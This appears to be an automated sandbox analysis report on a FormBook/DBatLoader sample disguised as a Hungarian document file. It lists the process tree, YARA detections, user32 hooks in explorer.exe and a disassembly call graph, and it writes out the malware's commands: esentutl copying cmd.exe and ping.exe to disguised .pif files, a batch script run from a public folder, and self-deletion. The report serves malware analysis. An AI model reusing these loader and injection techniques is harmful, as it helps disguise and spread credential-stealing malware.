                                                                                                                                                Nov 11, 2024 19:16:50.807073116 CET1236INData Raw: 63 4f 72 46 6f 46 6f 32 4e 6a 52 2f 45 49 7a 6a 49 37 64 41 5a 38 78 75 4a 55 41 33 74 74 45 51 38 33 7a 2f 71 4f 49 6f 6d 2b 4e 55 73 36 42 62 4d 46 36 6e 33 32 79 31 4d 34 42 56 2b 2b 52 38 70 36 68 36 4a 68 34 59 34 45 6d 61 36 79 57 4a 7a 45
                                                                                                                                                Data Ascii: cOrFoFo2NjR/EIzjI7dAZ8xuJUA3ttEQ83z/qOIom+NUs6BbMF6n32y1M4BV++R8p6h6Jh4Y4Ema6yWJzEKwI8NM0EqYp0nK+b+AY2sh47tN4tr/EBgcxkhZdfu+ZmGbKdQHN7N6IeqahAM3QDrzZLaeVwe1YE2vvpAqt7DxKyR38WYhf52IMKZc+ZYuPhhpyS+qEko/bh18ofJOyT0d59Z+pqKTPqVwB7UaxKGuWBviFPVZ3k2
                                                                                                                                                Nov 11, 2024 19:16:50.807085991 CET1236INData Raw: 38 32 47 6f 66 4a 6c 33 43 6a 35 4d 79 70 30 61 72 68 46 31 31 32 50 63 7a 51 52 45 79 71 69 51 54 33 68 30 41 73 75 59 4e 55 42 34 56 71 5a 58 4e 5a 64 48 4c 68 74 35 66 64 6f 77 51 50 32 46 66 41 55 67 2b 39 72 39 2f 39 66 70 59 54 59 34 50 59
                                                                                                                                                Data Ascii: 82GofJl3Cj5Myp0arhF112PczQREyqiQT3h0AsuYNUB4VqZXNZdHLht5fdowQP2FfAUg+9r9/9fpYTY4PY3iuF96606L7XNGsf5ySOjYC1ILttOr/Ch8po+QFyGfoNpcibLSbp+Vm9gDmZlOHbFo8uk3nAwGuLA3ydBuTZ+YmxVe0Zxc4UwbIxrjW5DupkaOOUvcUWESzV/y8ZHYo5BUvykLdbsaPfi3HIT4lJTCleljWHTIBD4
                                                                                                                                                Nov 11, 2024 19:16:50.807360888 CET1236INData Raw: 66 44 50 58 5a 33 73 41 73 56 75 6b 4c 57 74 44 77 67 35 67 57 69 30 6c 62 52 7a 67 38 2f 64 72 48 4f 42 45 61 6a 65 42 4e 6a 70 35 34 4a 39 6a 63 34 74 74 46 64 50 7a 53 49 6f 74 6b 39 49 71 57 4b 6f 6b 4d 4a 42 6b 41 57 33 47 30 65 46 53 4c 58
                                                                                                                                                Data Ascii: fDPXZ3sAsVukLWtDwg5gWi0lbRzg8/drHOBEajeBNjp54J9jc4ttFdPzSIotk9IqWKokMJBkAW3G0eFSLXCgXXD33+kKcN42FHn5S/Q0YhjQNb2KAIFvm0o2T87TdLfM441H3csQ0rXkRgFPiidA/e6aBwtqpBLEDR1uDaPObucTL0H9MeEdXO9ekm6nH28lrJkVx/xOdjtqh0V+EVw6r043uxXPHKJ35xWp1eC/jf2b0QCanMh
                                                                                                                                                Nov 11, 2024 19:16:50.811742067 CET1236INData Raw: 6a 77 69 2b 4f 37 67 36 68 50 6f 66 47 70 6b 49 53 69 4a 46 32 49 38 50 64 62 6b 6d 69 48 52 58 74 6f 6a 49 32 64 45 38 54 73 4b 6e 6a 36 47 70 2b 59 6d 41 4e 39 31 6e 56 32 2b 50 4a 55 38 33 2b 2b 77 65 6c 63 7a 4d 6a 4b 4c 69 39 39 61 4b 35 42
                                                                                                                                                Data Ascii: jwi+O7g6hPofGpkISiJF2I8PdbkmiHRXtojI2dE8TsKnj6Gp+YmAN91nV2+PJU83++welczMjKLi99aK5BRnuFuqpLcCfMZZXX+D+AlyQyXY4r3GXLA30DKdRbA2ZOrbygl6B2FkOJjYI9OB+nkDw4irrFoBMW/yGufT8A1T76X4hMwzLMmPOF7KybeuZiHiMLlKWe1nKx4NldF9CT3vg99CsjIqrYKrbHHOJBlvpXqJTSHL2As


                                                                                                                                                Code Manipulations

                                                                                                                                                User Modules

                                                                                                                                                Hook Summary

                                                                                                                                                Function NameHook TypeActive in Processes
                                                                                                                                                PeekMessageAINLINEexplorer.exe
                                                                                                                                                PeekMessageWINLINEexplorer.exe
                                                                                                                                                GetMessageWINLINEexplorer.exe
                                                                                                                                                GetMessageAINLINEexplorer.exe

                                                                                                                                                Processes

                                                                                                                                                Process: explorer.exe, Module: user32.dll
                                                                                                                                                Function NameHook TypeNew Data
                                                                                                                                                PeekMessageAINLINE0x48 0x8B 0xB8 0x83 0x3E 0xEF
                                                                                                                                                PeekMessageWINLINE0x48 0x8B 0xB8 0x8B 0xBE 0xEF
                                                                                                                                                GetMessageWINLINE0x48 0x8B 0xB8 0x8B 0xBE 0xEF
                                                                                                                                                GetMessageAINLINE0x48 0x8B 0xB8 0x83 0x3E 0xEF

                                                                                                                                                Statistics

                                                                                                                                                CPU Usage

                                                                                                                                                Click to jump to process

                                                                                                                                                Memory Usage

                                                                                                                                                Click to jump to process

                                                                                                                                                High Level Behavior Distribution

                                                                                                                                                Click to dive into process behavior distribution

                                                                                                                                                Behavior

                                                                                                                                                Click to jump to process

                                                                                                                                                System Behavior

                                                                                                                                                General

                                                                                                                                                Target ID:0
                                                                                                                                                Start time:13:16:45
                                                                                                                                                Start date:11/11/2024
                                                                                                                                                Path:C:\Users\user\Desktop\#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe
                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                Commandline:"C:\Users\user\Desktop\#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe"
                                                                                                                                                Imagebase:0x400000
                                                                                                                                                File size:1'056'768 bytes
                                                                                                                                                MD5 hash:FFD79398ECB6B74AE4E751157796870B
                                                                                                                                                Has elevated privileges:true
                                                                                                                                                Has administrator privileges:true
                                                                                                                                                Programmed in:Borland Delphi
                                                                                                                                                Yara matches:
                                                                                                                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.1804179416.00000000216EA000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000000.00000002.1804179416.00000000216EA000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000000.00000002.1804179416.00000000216EA000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.1804179416.00000000216EA000.00000004.00001000.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.1804179416.00000000216EA000.00000004.00001000.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.1804731212.0000000021A01000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000000.00000002.1804731212.0000000021A01000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000000.00000002.1804731212.0000000021A01000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.1804731212.0000000021A01000.00000004.00001000.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.1804731212.0000000021A01000.00000004.00001000.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                • Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: 00000000.00000003.1700194533.000000007FAD0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.1803550151.00000000211C0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000000.00000002.1803550151.00000000211C0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000000.00000002.1803550151.00000000211C0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.1803550151.00000000211C0000.00000040.00001000.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.1803550151.00000000211C0000.00000040.00001000.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                Reputation:low
                                                                                                                                                Has exited:true

                                                                                                                                                General

                                                                                                                                                Target ID:1
                                                                                                                                                Start time:13:16:51
                                                                                                                                                Start date:11/11/2024
                                                                                                                                                Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Libraries\rqbnwzgR.cmd" "
                                                                                                                                                Imagebase:0x240000
                                                                                                                                                File size:236'544 bytes
                                                                                                                                                MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                Has elevated privileges:true
                                                                                                                                                Has administrator privileges:true
                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                Reputation:high
                                                                                                                                                Has exited:true

                                                                                                                                                General

                                                                                                                                                Target ID:2
                                                                                                                                                Start time:13:16:51
                                                                                                                                                Start date:11/11/2024
                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                Imagebase:0x7ff7699e0000
                                                                                                                                                File size:862'208 bytes
                                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                Has elevated privileges:true
                                                                                                                                                Has administrator privileges:true
                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                Reputation:high
                                                                                                                                                Has exited:true

                                                                                                                                                General

                                                                                                                                                Target ID:3
                                                                                                                                                Start time:13:16:52
                                                                                                                                                Start date:11/11/2024
                                                                                                                                                Path:C:\Windows\SysWOW64\esentutl.exe
                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                Commandline:C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\cmd.exe /d C:\\Users\\Public\\alpha.pif /o
                                                                                                                                                Imagebase:0x310000
                                                                                                                                                File size:352'768 bytes
                                                                                                                                                MD5 hash:5F5105050FBE68E930486635C5557F84
                                                                                                                                                Has elevated privileges:true
                                                                                                                                                Has administrator privileges:true
                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                Reputation:moderate
                                                                                                                                                Has exited:true

                                                                                                                                                General

                                                                                                                                                Target ID:4
                                                                                                                                                Start time:13:16:52
                                                                                                                                                Start date:11/11/2024
                                                                                                                                                Path:C:\Windows\SysWOW64\esentutl.exe
                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                Commandline:C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\ping.exe /d C:\\Users\\Public\\xpha.pif /o
                                                                                                                                                Imagebase:0x310000
                                                                                                                                                File size:352'768 bytes
                                                                                                                                                MD5 hash:5F5105050FBE68E930486635C5557F84
                                                                                                                                                Has elevated privileges:true
                                                                                                                                                Has administrator privileges:true
                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                Reputation:moderate
                                                                                                                                                Has exited:true

                                                                                                                                                General

                                                                                                                                                Target ID:5
                                                                                                                                                Start time:13:16:52
                                                                                                                                                Start date:11/11/2024
                                                                                                                                                Path:C:\Windows\SysWOW64\SndVol.exe
                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                Commandline:C:\Windows\System32\SndVol.exe
                                                                                                                                                Imagebase:0x4e0000
                                                                                                                                                File size:226'712 bytes
                                                                                                                                                MD5 hash:BD4A1CC3429ED1251E5185A72501839B
                                                                                                                                                Has elevated privileges:true
                                                                                                                                                Has administrator privileges:true
                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                Yara matches:
                                                                                                                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.1887315560.0000000036300000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.1887315560.0000000036300000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.1887315560.0000000036300000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.1887315560.0000000036300000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.1887315560.0000000036300000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.1859607904.00000000047C0000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.1859607904.00000000047C0000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.1859607904.00000000047C0000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.1859607904.00000000047C0000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.1859607904.00000000047C0000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.1887410706.0000000036330000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.1887410706.0000000036330000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.1887410706.0000000036330000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.1887410706.0000000036330000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.1887410706.0000000036330000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                Reputation:moderate
                                                                                                                                                Has exited:true

                                                                                                                                                General

                                                                                                                                                Target ID:6
                                                                                                                                                Start time:13:16:54
                                                                                                                                                Start date:11/11/2024
                                                                                                                                                Path:C:\Windows\explorer.exe
                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                Commandline:C:\Windows\Explorer.EXE
                                                                                                                                                Imagebase:0x7ff72b770000
                                                                                                                                                File size:5'141'208 bytes
                                                                                                                                                MD5 hash:662F4F92FDE3557E86D110526BB578D5
                                                                                                                                                Has elevated privileges:false
                                                                                                                                                Has administrator privileges:false
                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                Reputation:high
                                                                                                                                                Has exited:false

                                                                                                                                                General

                                                                                                                                                Target ID:7
                                                                                                                                                Start time:13:16:58
                                                                                                                                                Start date:11/11/2024
                                                                                                                                                Path:C:\Windows\SysWOW64\netsh.exe
                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                Commandline:"C:\Windows\SysWOW64\netsh.exe"
                                                                                                                                                Imagebase:0x1560000
                                                                                                                                                File size:82'432 bytes
                                                                                                                                                MD5 hash:4E89A1A088BE715D6C946E55AB07C7DF
                                                                                                                                                Has elevated privileges:false
                                                                                                                                                Has administrator privileges:false
                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                Yara matches:
                                                                                                                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.4169626171.0000000000B80000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.4169626171.0000000000B80000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000007.00000002.4169626171.0000000000B80000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.4169626171.0000000000B80000.00000040.80000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.4169626171.0000000000B80000.00000040.80000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.4169882898.0000000001060000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.4169882898.0000000001060000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000007.00000002.4169882898.0000000001060000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.4169882898.0000000001060000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.4169882898.0000000001060000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.4169921124.0000000001090000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.4169921124.0000000001090000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000007.00000002.4169921124.0000000001090000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.4169921124.0000000001090000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.4169921124.0000000001090000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                Reputation:high
                                                                                                                                                Has exited:false

                                                                                                                                                General

                                                                                                                                                Target ID:9
                                                                                                                                                Start time:13:17:02
                                                                                                                                                Start date:11/11/2024
                                                                                                                                                Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                Commandline:/c del "C:\Windows\SysWOW64\SndVol.exe"
                                                                                                                                                Imagebase:0x7ff70f330000
                                                                                                                                                File size:236'544 bytes
                                                                                                                                                MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                Has elevated privileges:false
                                                                                                                                                Has administrator privileges:false
                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                Reputation:high
                                                                                                                                                Has exited:true

                                                                                                                                                General

                                                                                                                                                Target ID:10
                                                                                                                                                Start time:13:17:02
                                                                                                                                                Start date:11/11/2024
                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                Imagebase:0x7ff7699e0000
                                                                                                                                                File size:862'208 bytes
                                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                Has elevated privileges:false
                                                                                                                                                Has administrator privileges:false
                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                Reputation:high
                                                                                                                                                Has exited:true

                                                                                                                                                Disassembly

                                                                                                                                                Reset < >

                                                                                                                                                  Execution Graph

                                                                                                                                                  Execution Coverage:11.4%
                                                                                                                                                  Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                  Signature Coverage:10.9%
                                                                                                                                                  Total number of Nodes:560
                                                                                                                                                  Total number of Limit Nodes:13
                                                                                                                                                  execution_graph 32467 29cd2fc 32477 29a656c 32467->32477 32471 29cd32a 32482 29cc35c timeSetEvent 32471->32482 32473 29cd334 32474 29cd342 GetMessageA 32473->32474 32475 29cd336 TranslateMessage DispatchMessageA 32474->32475 32476 29cd352 32474->32476 32475->32474 32478 29a6577 32477->32478 32483 29a4198 32478->32483 32481 29a42ac SysFreeString SysReAllocStringLen SysAllocStringLen 32481->32471 32482->32473 32484 29a41de 32483->32484 32485 29a43e8 32484->32485 32486 29a4257 32484->32486 32489 29a4419 32485->32489 32492 29a442a 32485->32492 32497 29a4130 32486->32497 32502 29a435c GetStdHandle WriteFile GetStdHandle WriteFile MessageBoxA 32489->32502 32491 29a4423 32491->32492 32493 29a446f FreeLibrary 32492->32493 32494 29a4493 32492->32494 32493->32492 32495 29a449c 32494->32495 32496 29a44a2 ExitProcess 32494->32496 32495->32496 32498 29a4140 32497->32498 32499 29a4173 32497->32499 32498->32499 32503 29a5868 32498->32503 32507 29a15cc 32498->32507 32499->32481 32502->32491 32504 29a5878 GetModuleFileNameA 32503->32504 32505 29a5894 32503->32505 32511 29a5acc GetModuleFileNameA RegOpenKeyExA 32504->32511 32505->32498 32530 29a1560 32507->32530 32509 29a15d4 VirtualAlloc 32510 29a15eb 32509->32510 32510->32498 32512 29a5b4f 32511->32512 32513 29a5b0f RegOpenKeyExA 32511->32513 32529 29a5908 12 API calls 32512->32529 32513->32512 32514 29a5b2d RegOpenKeyExA 32513->32514 32514->32512 32516 29a5bd8 lstrcpynA GetThreadLocale GetLocaleInfoA 32514->32516 32519 29a5c0f 32516->32519 32520 29a5cf2 32516->32520 32517 29a5b74 RegQueryValueExA 32518 29a5b94 RegQueryValueExA 32517->32518 32522 29a5bb2 RegCloseKey 32517->32522 32518->32522 32519->32520 32521 29a5c1f lstrlenA 32519->32521 32520->32505 32524 29a5c37 32521->32524 32522->32505 32524->32520 32525 29a5c5c lstrcpynA LoadLibraryExA 32524->32525 32526 29a5c84 32524->32526 32525->32526 32526->32520 32527 29a5c8e lstrcpynA LoadLibraryExA 32526->32527 32527->32520 32528 29a5cc0 lstrcpynA LoadLibraryExA 32527->32528 32528->32520 32529->32517 32531 29a1500 32530->32531 32531->32509 32532 29a4edc 32533 29a4ee9 32532->32533 32537 29a4ef0 32532->32537 32538 29a4c38 32533->32538 32544 29a4c50 32537->32544 32539 29a4c4c 32538->32539 32540 29a4c3c SysAllocStringLen 32538->32540 32539->32537 32540->32539 32541 29a4c30 32540->32541 32542 29a4f3c 32541->32542 32543 29a4f26 SysAllocStringLen 32541->32543 32542->32537 32543->32541 32543->32542 32545 29a4c5c 32544->32545 32546 29a4c56 SysFreeString 32544->32546 32546->32545 32547 29a1c6c 32548 29a1c7c 32547->32548 32549 29a1d04 32547->32549 32550 29a1c89 32548->32550 32551 29a1cc0 32548->32551 32552 29a1f58 32549->32552 32553 29a1d0d 32549->32553 32555 29a1c94 32550->32555 32595 29a1724 32550->32595 32554 29a1724 10 API calls 32551->32554 32556 29a1fec 32552->32556 32561 29a1f68 32552->32561 32562 29a1fac 32552->32562 32557 29a1e24 32553->32557 32558 29a1d25 32553->32558 32559 29a1cd7 32554->32559 32575 29a1e7c 32557->32575 32576 29a1e55 Sleep 32557->32576 32579 29a1e95 32557->32579 32563 29a1d2c 32558->32563 32568 29a1d48 32558->32568 32569 29a1dfc 32558->32569 32582 29a1a8c 8 API calls 32559->32582 32585 29a1cfd 32559->32585 32566 29a1724 10 API calls 32561->32566 32564 29a1fb2 32562->32564 32570 29a1724 10 API calls 32562->32570 32565 29a1ca1 32583 29a1cb9 32565->32583 32619 29a1a8c 32565->32619 32586 29a1f82 32566->32586 32567 29a1724 10 API calls 32584 29a1f2c 32567->32584 32571 29a1d79 Sleep 32568->32571 32572 29a1d9c 32568->32572 32573 29a1724 10 API calls 32569->32573 32588 29a1fc1 32570->32588 32571->32572 32577 29a1d91 Sleep 32571->32577 32590 29a1e05 32573->32590 32574 29a1fa7 32575->32567 32575->32579 32576->32575 32578 29a1e6f Sleep 32576->32578 32577->32568 32578->32557 32581 29a1e1d 32582->32585 32584->32579 32589 29a1a8c 8 API calls 32584->32589 32586->32574 32587 29a1a8c 8 API calls 32586->32587 32587->32574 32588->32574 32591 29a1a8c 8 API calls 32588->32591 32592 29a1f50 32589->32592 32590->32581 32593 29a1a8c 8 API calls 32590->32593 32594 29a1fe4 32591->32594 32593->32581 32596 29a1968 32595->32596 32597 29a173c 32595->32597 32598 29a1938 32596->32598 32599 29a1a80 32596->32599 32606 29a17cb Sleep 32597->32606 32607 29a174e 32597->32607 32603 29a1947 Sleep 32598->32603 32612 29a1986 32598->32612 32600 29a1a89 32599->32600 32601 29a1684 VirtualAlloc 32599->32601 32600->32565 32604 29a16bf 32601->32604 32605 29a16af 32601->32605 32602 29a175d 32602->32565 32609 29a195d Sleep 32603->32609 32603->32612 32604->32565 32636 29a1644 32605->32636 32606->32607 32611 29a17e4 Sleep 32606->32611 32607->32602 32608 29a182c 32607->32608 32613 29a180a Sleep 32607->32613 32617 29a15cc VirtualAlloc 32608->32617 32618 29a1838 32608->32618 32609->32598 32611->32597 32614 29a15cc VirtualAlloc 32612->32614 32616 29a19a4 32612->32616 32613->32608 32615 29a1820 Sleep 32613->32615 32614->32616 32615->32607 32616->32565 32617->32618 32618->32565 32620 29a1b6c 32619->32620 32621 29a1aa1 32619->32621 32622 29a16e8 32620->32622 32623 29a1aa7 32620->32623 32621->32623 32625 29a1b13 Sleep 32621->32625 32624 29a1c66 32622->32624 32628 29a1644 2 API calls 32622->32628 32626 29a1ab0 32623->32626 32629 29a1b4b Sleep 32623->32629 32633 29a1b81 32623->32633 32624->32583 32625->32623 32627 29a1b2d Sleep 32625->32627 32626->32583 32627->32621 32630 29a16f5 VirtualFree 32628->32630 32631 29a1b61 Sleep 32629->32631 32629->32633 32632 29a170d 32630->32632 32631->32623 32632->32583 32634 29a1c00 VirtualFree 32633->32634 32635 29a1ba4 32633->32635 32634->32583 32635->32583 32637 29a1681 32636->32637 32638 29a164d 32636->32638 32637->32604 32638->32637 32639 29a164f Sleep 32638->32639 32640 29a1664 32639->32640 32640->32637 32641 29a1668 Sleep 32640->32641 32641->32638 32642 29cc350 32645 29bf7c8 32642->32645 32646 29bf7d0 32645->32646 32646->32646 32647 29bf7d7 32646->32647 35064 29b88b8 LoadLibraryW 32647->35064 32649 29bf7f1 35069 29a2ee0 QueryPerformanceCounter 32649->35069 32651 29bf7f6 32652 29bf800 InetIsOffline 32651->32652 32653 29bf81b 32652->32653 32654 29bf80a 32652->32654 32656 29a4530 11 API calls 32653->32656 35081 29a4530 32654->35081 32657 29bf819 32656->32657 35072 29a4860 32657->35072 35087 29b8274 35064->35087 35066 29b88f1 35098 29b7d78 35066->35098 35070 29a2ef8 GetTickCount 35069->35070 35071 29a2eed 35069->35071 35070->32651 35071->32651 35073 29a4871 35072->35073 35074 29a48ae 35073->35074 35075 29a4897 35073->35075 35077 29a45a0 11 API calls 35074->35077 35076 29a4bcc 11 API calls 35075->35076 35079 29a48a4 35076->35079 35077->35079 35078 29a48df 35079->35078 35080 29a4530 11 API calls 35079->35080 35080->35078 35082 29a4534 35081->35082 35083 29a4544 35081->35083 35082->35083 35085 29a45a0 11 API calls 35082->35085 35084 29a4572 35083->35084 35172 29a2c2c 11 API calls 35083->35172 35084->32657 35085->35083 35088 29a4530 11 API calls 35087->35088 35089 29b8299 35088->35089 35112 29b798c 35089->35112 35093 29b82b3 35094 29b82bb GetModuleHandleW GetProcAddress GetProcAddress 35093->35094 35095 29b82ee 35094->35095 35133 29a4500 35095->35133 35099 29a4530 11 API calls 35098->35099 35100 29b7d9d 35099->35100 35101 29b798c 12 API calls 35100->35101 35102 29b7daa 35101->35102 35103 29a47ec 11 API calls 35102->35103 35104 29b7dba 35103->35104 35161 29b81cc 35104->35161 35107 29b8274 15 API calls 35108 29b7dd3 NtWriteVirtualMemory 35107->35108 35109 29b7dff 35108->35109 35110 29a4500 11 API calls 35109->35110 35111 29b7e0c FreeLibrary 35110->35111 35111->32649 35113 29b799d 35112->35113 35137 29a4bcc 35113->35137 35115 29b7a19 35118 29a47ec 35115->35118 35116 29b79ad 35116->35115 35146 29ababc CharNextA 35116->35146 35119 29a47f0 35118->35119 35120 29a4851 